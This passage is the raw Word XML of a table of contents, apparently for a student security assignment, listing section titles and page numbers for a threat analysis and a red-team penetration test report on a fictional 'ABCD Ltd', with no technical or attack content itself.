              <w:t>Threat Actor Profile and Motive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B31C9B2" w14:textId="6C40AE21" w:rsidR="001A1641" w:rsidRPr="00C668B5" w:rsidRDefault="00EB5A9D" w:rsidP="00FB5A2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13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A1641" w:rsidRPr="00C668B5" w14:paraId="3089D2A4" w14:textId="77777777" w:rsidTr="00304D0A">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FCA89B5" w14:textId="5BEF5AF3" w:rsidR="001A1641" w:rsidRPr="00C668B5" w:rsidRDefault="001A1641" w:rsidP="007D1079">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4811CD34" w14:textId="0881057B" w:rsidR="001A1641" w:rsidRPr="00FB5A26" w:rsidRDefault="001A1641" w:rsidP="00FB5A26">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FB5A26">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Detection and Response Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DFA25D2" w14:textId="2A849FD4" w:rsidR="001A1641" w:rsidRPr="00C668B5" w:rsidRDefault="00EB5A9D" w:rsidP="00FB5A2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14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A1641" w:rsidRPr="00C668B5" w14:paraId="0F1F7B8B" w14:textId="77777777" w:rsidTr="00304D0A">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="657B84DF" w14:textId="73DA77AB" w:rsidR="001A1641" w:rsidRPr="00C668B5" w:rsidRDefault="001A1641" w:rsidP="007D1079">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EA55759" w14:textId="1F2DD8DA" w:rsidR="001A1641" w:rsidRPr="00FB5A26" w:rsidRDefault="001A1641" w:rsidP="00FB5A26">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FB5A26">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Strategic Recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3814C03B" w14:textId="05D9860E" w:rsidR="001A1641" w:rsidRPr="00C668B5" w:rsidRDefault="00EB5A9D" w:rsidP="00FB5A2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15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A1641" w:rsidRPr="00C668B5" w14:paraId="723D55C2" w14:textId="77777777" w:rsidTr="00304D0A">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79F07623" w14:textId="2284C235" w:rsidR="001A1641" w:rsidRPr="00C668B5" w:rsidRDefault="001A1641" w:rsidP="007D1079">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18F1241D" w14:textId="5A1B3282" w:rsidR="001A1641" w:rsidRPr="00FB5A26" w:rsidRDefault="001A1641" w:rsidP="00FB5A26">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FB5A26">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Conclusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="760328B3" w14:textId="4A7D23C1" w:rsidR="001A1641" w:rsidRPr="00C668B5" w:rsidRDefault="00EB5A9D" w:rsidP="00FB5A2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17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A1641" w:rsidRPr="00C668B5" w14:paraId="7B4C10E0" w14:textId="77777777" w:rsidTr="00304D0A">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6ED6DAA7" w14:textId="2EB67609" w:rsidR="001A1641" w:rsidRPr="00C668B5" w:rsidRDefault="001A1641" w:rsidP="007D1079">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="438F3B7E" w14:textId="32B3970C" w:rsidR="001A1641" w:rsidRPr="00FB5A26" w:rsidRDefault="001A1641" w:rsidP="00FB5A26">
            <w:pP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FB5A26">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68EA304E" w14:textId="12ED63D6" w:rsidR="001A1641" w:rsidRPr="00C668B5" w:rsidRDefault="00EB5A9D" w:rsidP="00FB5A2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18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A1641" w:rsidRPr="00C668B5" w14:paraId="3C739F8D" w14:textId="77777777" w:rsidTr="00304D0A">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="645AB7EA" w14:textId="77777777" w:rsidR="001A1641" w:rsidRPr="00C668B5" w:rsidRDefault="001A1641" w:rsidP="007D1079">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="074E852C" w14:textId="77777777" w:rsidR="001A1641" w:rsidRPr="00C668B5" w:rsidRDefault="001A1641"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A579172" w14:textId="77777777" w:rsidR="001A1641" w:rsidRPr="00C668B5" w:rsidRDefault="001A1641"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
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A1641" w:rsidRPr="00C668B5" w14:paraId="6CD5C65A" w14:textId="77777777" w:rsidTr="00304D0A">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="23682164" w14:textId="4E7C911F" w:rsidR="001A1641" w:rsidRPr="00C668B5" w:rsidRDefault="001A1641" w:rsidP="00304D0A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Task 2 - </w:t>
            </w:r>
            <w:r w:rsidR="003E04A6" w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>RED TEAM PENETRATION TEST REPORT (ABCD Ltd — Full Threat Emulation Engagement)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E04A6" w:rsidRPr="00C668B5" w14:paraId="704EB0E7" w14:textId="77777777" w:rsidTr="00304D0A">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="140CEA07" w14:textId="15E59085" w:rsidR="003E04A6" w:rsidRPr="00C668B5" w:rsidRDefault="003E04A6" w:rsidP="007D1079">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E7ABD26" w14:textId="4E2159BC" w:rsidR="003E04A6" w:rsidRPr="00FB5A26" w:rsidRDefault="003E04A6"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FB5A26">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Executive Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55B733E5" w14:textId="5A5E0709" w:rsidR="003E04A6" w:rsidRPr="00C668B5" w:rsidRDefault="00EB5A9D" w:rsidP="00FB5A2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22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E04A6" w:rsidRPr="00C668B5" w14:paraId="637714D8" w14:textId="77777777" w:rsidTr="00304D0A">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FB30B17" w14:textId="2B028329" w:rsidR="003E04A6" w:rsidRPr="00C668B5" w:rsidRDefault="003E04A6" w:rsidP="007D1079">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42BD5FF3" w14:textId="0612E61D" w:rsidR="003E04A6" w:rsidRPr="00FB5A26" w:rsidRDefault="003E04A6"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FB5A26">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Virtualized Laboratory Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7616CB02" w14:textId="1F582022" w:rsidR="003E04A6" w:rsidRPr="00C668B5" w:rsidRDefault="00EB5A9D" w:rsidP="00FB5A2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23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E04A6" w:rsidRPr="00C668B5" w14:paraId="60B01222" w14:textId="77777777" w:rsidTr="00304D0A">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2ED57C17" w14:textId="5DB49584" w:rsidR="003E04A6" w:rsidRPr="00C668B5" w:rsidRDefault="003E04A6" w:rsidP="007D1079">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F0640E4" w14:textId="731147C0" w:rsidR="003E04A6" w:rsidRPr="00FB5A26" w:rsidRDefault="003E04A6"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FB5A26">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Threat Emulation Plan — MITRE ATT&amp;CK Mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DF4500F" w14:textId="5408E448" w:rsidR="003E04A6" w:rsidRPr="00C668B5" w:rsidRDefault="00EB5A9D" w:rsidP="00FB5A2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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E04A6" w:rsidRPr="00C668B5" w14:paraId="4EE4A3CD" w14:textId="77777777" w:rsidTr="00304D0A">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35A4A44B" w14:textId="3CFE1C78" w:rsidR="003E04A6" w:rsidRPr="00C668B5" w:rsidRDefault="003E04A6" w:rsidP="007D1079">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="083FAAA4" w14:textId="77C58B42" w:rsidR="003E04A6" w:rsidRPr="00FB5A26" w:rsidRDefault="003E04A6"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FB5A26">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Exploitation — Technical Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D81FD72" w14:textId="1D270973" w:rsidR="003E04A6" w:rsidRPr="00C668B5" w:rsidRDefault="00EB5A9D" w:rsidP="00FB5A2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26</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E04A6" w:rsidRPr="00C668B5" w14:paraId="72C5EC8C" w14:textId="77777777" w:rsidTr="00304D0A">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="155452C5" w14:textId="2E10AD79" w:rsidR="003E04A6" w:rsidRPr="00C668B5" w:rsidRDefault="003E04A6" w:rsidP="007D1079">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EF812C7" w14:textId="7619A310" w:rsidR="003E04A6" w:rsidRPr="00FB5A26" w:rsidRDefault="003E04A6"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FB5A26">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Detection Gap Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DF53382" w14:textId="3FFFFCAD" w:rsidR="003E04A6" w:rsidRPr="00C668B5" w:rsidRDefault="00EB5A9D" w:rsidP="00FB5A2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3</w:t>
            </w:r>
            <w:r w:rsidR="009F4FC9">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E04A6" w:rsidRPr="00C668B5" w14:paraId="0D542C3F" w14:textId="77777777" w:rsidTr="00304D0A">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0593B837" w14:textId="3ECAF0D5" w:rsidR="003E04A6" w:rsidRPr="00C668B5" w:rsidRDefault="003E04A6" w:rsidP="007D1079">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F0EB95A" w14:textId="7132374A" w:rsidR="003E04A6" w:rsidRPr="00FB5A26" w:rsidRDefault="003E04A6"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FB5A26">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Remediation Recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42E95AFB" w14:textId="62D63537" w:rsidR="003E04A6" w:rsidRPr="00C668B5" w:rsidRDefault="009F4FC9" w:rsidP="00FB5A2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Pr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E04A6" w:rsidRPr="00C668B5" w14:paraId="2C90052B" w14:textId="77777777" w:rsidTr="00304D0A">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74A5CF5E" w14:textId="0A85F512" w:rsidR="003E04A6" w:rsidRPr="00C668B5" w:rsidRDefault="003E04A6" w:rsidP="007D1079">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18113041" w14:textId="2C23066F" w:rsidR="003E04A6" w:rsidRPr="00FB5A26" w:rsidRDefault="003E04A6"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FB5A26">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Rules of Engagement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6674DEB0" w14:textId="3063F76E" w:rsidR="003E04A6" w:rsidRPr="00C668B5" w:rsidRDefault="009F4FC9" w:rsidP="00FB5A2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Pr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E04A6" w:rsidRPr="00C668B5" w14:paraId="6529A2A3" w14:textId="77777777" w:rsidTr="00304D0A">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D4E5750" w14:textId="50177746" w:rsidR="003E04A6" w:rsidRPr="00C668B5" w:rsidRDefault="003E04A6" w:rsidP="007D1079">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="717884C8" w14:textId="095129F9" w:rsidR="003E04A6" w:rsidRPr="00FB5A26" w:rsidRDefault="003E04A6"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FB5A26">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="378ADC13" w14:textId="4378F92C" w:rsidR="003E04A6" w:rsidRPr="00C668B5" w:rsidRDefault="009F4FC9" w:rsidP="00FB5A26">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Pr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
